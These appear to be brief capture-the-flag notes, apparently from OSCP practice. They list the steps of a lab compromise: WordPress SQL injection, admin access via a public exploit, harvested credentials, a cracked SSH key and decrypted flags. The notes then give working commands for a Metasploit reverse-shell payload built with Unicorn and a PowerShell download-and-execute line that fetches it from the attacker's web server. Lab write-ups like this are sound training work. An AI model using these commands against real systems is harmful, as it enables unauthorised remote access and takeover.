- Nmap
- SSL Enum -> Add hostnames to
/etc/hosts. - WPscan -> authenticated sql Injection.
- WPScan enumerate users.
- Searchsploit -> Unauthenticated Admin access
- Use exploit html, edit URLs and exploit the vuln.
- Login as Admin
- Find user SMTP Password in Plugin.
- Setup SMTP Client and read emails.
- Credentials to Forum in Emails.
- Find encrypted Forum Entries.
- Decrypt Key with one time pad.
- Decrypt URL with recovered Key.
- Get URL for id_rsa file.
- Crack Password for file.
- Login with SSH.
- Find RSA encryption script.
- Google "Decrypt RSA with P Q A given" copy script from Stackoverrflow
- Decrypt and Convert Flag from Hex to Ascii.
Takeaways
- Check SSL Information in Browser for e.g. Emails. And Add Hostnames to
/etc/hosts. - Use Burp Suite Redirect Proxy set on 127.0.0.1 to point to remote host.
- Use devtools to uncover censored passwords.
Take aways:
Use Unicorn to upgrade shells
unicorn windows/meterpreter/reverse_tcp $local_ip $local_port
This will generate one rc file for msf and one powershell script.
Start metasploit:
msfconsole -r unicorn.rc
Cut the powershell payload to only the part in double quotes and save in shell.html
Start a local webserver to serve file.
python -m http.server 80
Execute in windows console
powershell "IEX(New-Object Net.WebClient).downloadString('http://$IP/shell.html')"
Thank you for your work which is making the oscp preparation an awesome experience.